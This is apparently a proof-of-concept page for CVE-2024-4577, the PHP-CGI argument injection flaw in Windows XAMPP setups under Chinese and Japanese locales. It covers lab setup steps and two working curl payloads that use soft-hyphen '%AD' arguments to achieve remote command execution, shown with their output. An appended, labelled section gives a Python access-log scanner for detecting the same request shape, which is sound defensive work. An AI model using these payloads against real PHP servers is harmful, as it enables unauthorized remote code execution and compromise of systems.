CVE-2024-4577
CVE-2024-4577 is a PHP CGI Argument Injection Vulnerability discovered by DEVCORE. The vulnerability has been verified on Windows machines running in the following locales:
Traditional Chinese (Code Page 950)
Simplified Chinese (Code Page 936)
Japanese (Code Page 932)
All versions of XAMPP on Windows are vulnerable by default. The following PHP versions are affected on the Windows operating system:
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
How to set up your own PoC environment
On your Windows machine download and install XAMPP.
Download mod_fcgid.so and paste it in
C:\xampp\apache\modules
Verify that the following block is not commented out in
C:\xampp\apache\conf\extra\httpd-xampp.conf
#
# PHP-CGI setup
#
<FilesMatch "\.php$">
SetHandler application/x-httpd-php-cgi
</FilesMatch>
<IfModule actions_module>
Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"
</IfModule>
Start Apache / PHP from the XAMPP Control Panel and verify that CGI/FastCGI is running.
Change the system locale to one of the three locales listed above and reboot the host. This does not change the Windows display language. Control Panel > Clock and Region > Region > Administrative > Change system locale...
Once rebooted, start the web server again and attack the target from any host.
dev :: ~ » curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c "whoami"'); ?>"
desktop-n7r8uh6\void
dev :: ~ » curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c "dir"'); ?>"
Volume in drive C has no label.
Volume Serial Number is 0AE3-44EE
Directory of C:\xampp\htdocs
2024-08-14 12:25 <DIR> .
2024-08-14 10:45 <DIR> ..
2022-06-15 18:07 3?607 applications.html
2022-06-15 18:07 177 bitnami.css
2024-08-14 10:18 <DIR> dashboard
2015-07-16 17:32 30?894 favicon.ico
2024-08-14 10:18 <DIR> img
2015-07-16 17:32 260 index.php
2024-08-14 10:17 <DIR> webalizer
2024-08-14 10:18 <DIR> xampp
4 File(s) 34?938 bytes
6 Dir(s) 28?033?204?224 bytes free
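For the defensive side, here is an added example (not part of the original page) that scans Apache access-log lines for the request shape used above: a `+`-separated query string with no unencoded `=`, in which a token begins with the percent-encoded soft hyphen (`%AD`). The log lines are constructed, and the argv-splitting rule is the CGI behaviour the PoC relies on, which is why the `=` characters in the request are encoded as `%3d`.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed Apache access-log lines (not real traffic). The first one
# reproduces the request shape from the PoC above; the last one keeps a
# raw '=' in the query, so Apache would never pass it to php-cgi as argv.
SAMPLE_LOG = """\
192.0.2.10 - - [14/Aug/2024:12:25:01 +0000] "POST /index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 41 "-" "curl/8.4.0"
192.0.2.11 - - [14/Aug/2024:12:25:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 260 "-" "Mozilla/5.0"
192.0.2.12 - - [14/Aug/2024:12:25:03 +0000] "GET /index.php?%add+allow_url_include%3d1 HTTP/1.1" 200 12 "-" "python-requests/2.31"
192.0.2.13 - - [14/Aug/2024:12:25:04 +0000] "GET /index.php?q=%ADd+x%3d1 HTTP/1.1" 200 5 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# U+00AD (soft hyphen) is a single byte 0xAD in code pages 932/936/950;
# Windows best-fit mapping turns it into an ASCII '-' before php-cgi
# parses its arguments, so "%ADd" reaches php-cgi as the "-d" option.
SOFT_HYPHEN = b"\xad"


def argv_tokens(query: str) -> list[bytes]:
    """Return the argv php-cgi would receive from this query string.

    Per RFC 3875, Apache passes the query string as command-line arguments
    only when it contains no unencoded '='; it is then split on '+' and each
    part is percent-decoded. An encoded '=' (%3d) survives this check.
    """
    if "=" in query:
        return []
    return [unquote_to_bytes(part) for part in query.split("+") if part]


def is_argument_injection(target: str) -> bool:
    """True if any argv token would start with the soft-hyphen byte."""
    _, _, query = target.partition("?")
    return any(tok[:1] == SOFT_HYPHEN for tok in argv_tokens(query))


def scan_log(text: str) -> list[tuple[str, str]]:
    """Return (client_ip, request_target) for every suspicious request line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_argument_injection(m.group("target")):
            hits.append((m.group("ip"), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOG):
        print(f"suspicious php-cgi argument injection from {ip}: {target}")
```

The check is intentionally narrow: it flags only requests that would actually be handed to php-cgi as arguments, so `%AD` inside an ordinary `name=value` parameter does not produce a hit.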